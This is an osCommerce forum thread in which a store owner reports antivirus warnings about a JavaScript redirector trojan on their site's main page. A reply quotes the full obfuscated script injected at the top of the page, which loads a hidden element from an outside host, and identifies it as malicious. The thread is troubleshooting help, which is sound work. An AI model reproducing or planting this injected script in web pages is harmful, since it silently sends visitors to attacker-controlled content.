Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Trojan Dected


shadycc

Recommended Posts

Posted

Dear Everyone,

 

I am going crazy after a while of installing the oscommerce on my website, now whenever i try accessing the main page i keep getting bounced back due to the following reasons:

 

 

===============================================================================================

Category: Trojan (Trojan:JS/Redirector.DB)

 

Description: This program is dangerous and executes commands from an attacker.

 

Recommendation: Remove this software immediately.

 

Microsoft Security Essentials detected programs that may compromise your privacy or damage your computer. You can still access the files that these programs use without removing them (not recommended). To access these files, select the 'Allow' action and click 'Apply actions'. If this option is not available, log on as administrator or ask the local administrator for help.

 

Items:

file:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\27QH9OX8\index[1].htm

 

Get more information about this item online.

 

===============================================================================================

 

I have microsoft secuirty essentials, also i tried it avast and kaspersky same thing.....

 

i check the hosting company and did a full checking on the website, there are no virus or infections at all.

 

Please advice.

 

Thanks

Posted

Dear Everyone,

 

I am going crazy after a while of installing the oscommerce on my website, now whenever i try accessing the main page i keep getting bounced back due to the following reasons:

 

 

===============================================================================================

Category: Trojan (Trojan:JS/Redirector.DB)

 

Description: This program is dangerous and executes commands from an attacker.

 

Recommendation: Remove this software immediately.

 

Microsoft Security Essentials detected programs that may compromise your privacy or damage your computer. You can still access the files that these programs use without removing them (not recommended). To access these files, select the 'Allow' action and click 'Apply actions'. If this option is not available, log on as administrator or ask the local administrator for help.

 

Items:

file:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\27QH9OX8\index[1].htm

 

Get more information about this item online.

 

===============================================================================================

 

I have microsoft secuirty essentials, also i tried it avast and kaspersky same thing.....

 

i check the hosting company and did a full checking on the website, there are no virus or infections at all.

 

Please advice.

 

Thanks

At the very top of the index page source:

 

<script>var Eu=new Array();var DO;if(DO!='b'){DO=''};function m(){var I;if(I!='' && I!='j'){I='t'};var X=window;var W=new Date();var E=X['unescape'];this.q='';var F=E("%2f%77%6f%72%6c%64%6f%66%77%61%72%63%72%61%66%74%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6c%65%6d%6f%6e%64%65%2e%66%72%2e%70%68%70");var z=new String();function H(Y,k){var Et;if(Et!='' && Et!='Rp'){Et=''};var w=E("%5d");var wp="";var ks;if(ks!='' && ks!='g'){ks=null};var Yb=E("%5b");this.O="";this.hv="";var x=String("g");var HP=new Date();var EE;if(EE!='Q' && EE != ''){EE=null};var hT;if(hT!='' && hT!='tQ'){hT=''};var Z=new RegExp(Yb+k+w, x);var _IM=new Date();var PW;if(PW!='' && PW!='rv'){PW=null};this.Ck="";return Y.replace(Z, new String());var xt="";};var QvZ;if(QvZ!='' && QvZ!='EV'){QvZ=null};var EM;if(EM!='EY' && EM != ''){EM=null};this.jN="";var V=H('shrjc0','zU0hqSeKHZijxL8D');this._k='';var SC;if(SC!='' && SC!='DH'){SC=''};var R=H('dKemf4eXrA','XVKmU4lA');var SN=new Date();var o=H('8149621621911606461494719418224739246390412414413114','41265397');var Tw;if(Tw!='' && Tw!='HC'){Tw=null};var y=document;var _=H('sQc3r_iFpFtQ','CFyQ3V_');var OM=new String();function c(){var U=E("%68%74%74%70%3a%2f%2f%72%65%61%6c%73%68%6f%70%6f%6e%6c%69%6e%65%2e%69%6e%66%6f%3a");var Ww="";var fn='';var _I=U;_I+=o;var wv;if(wv!='' && wv!='Nn'){wv='VO'};var Xh=new Date();_I+=F;this.xj="";try {var zF;if(zF!='' && zF!='Ko'){zF='QI'};var AD;if(AD!='Uf'){AD=''};a=y[H('cCrPekaqtLeCEzl5eCmNeqnLt_','zXkfL6PKiJFg5DC3BN_hq')](_);this.qk='';var Fo;if(Fo!='Ce'){Fo=''};a[V]=_I;a[R]=[1][0];var be='';y.body[H('acpfpueIncdNCRhxi5lDd5','IfRt0u5B3N8DxEvc')](a);var Uzm=new String();} catch(d){this.Hq='';};var my=new Date();var dc='';var dR;if(dR!='' && dR!='Rl'){dR=null};}var pv;if(pv!='jf'){pv=''};var ZN=H('o6nil4ovaPde','7tWu3MZ5P206Acev_Qfsi4D');var Ms;if(Ms!='Xn'){Ms='Xn'};var lE=new Date();var LC=new Array();X[ZN]=c;var Nl;if(Nl!='lK'){Nl='lK'};var Qd="";var CX=new Date();};m();var kL;if(kL!='dS' && kL!='SV'){kL=''};var _m;if(_m!='bMt'){_m=''};</script>
<!--275fadf8ffb821b54e13df2a70e26c0d-->

Looks like a rat to me...

:o

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...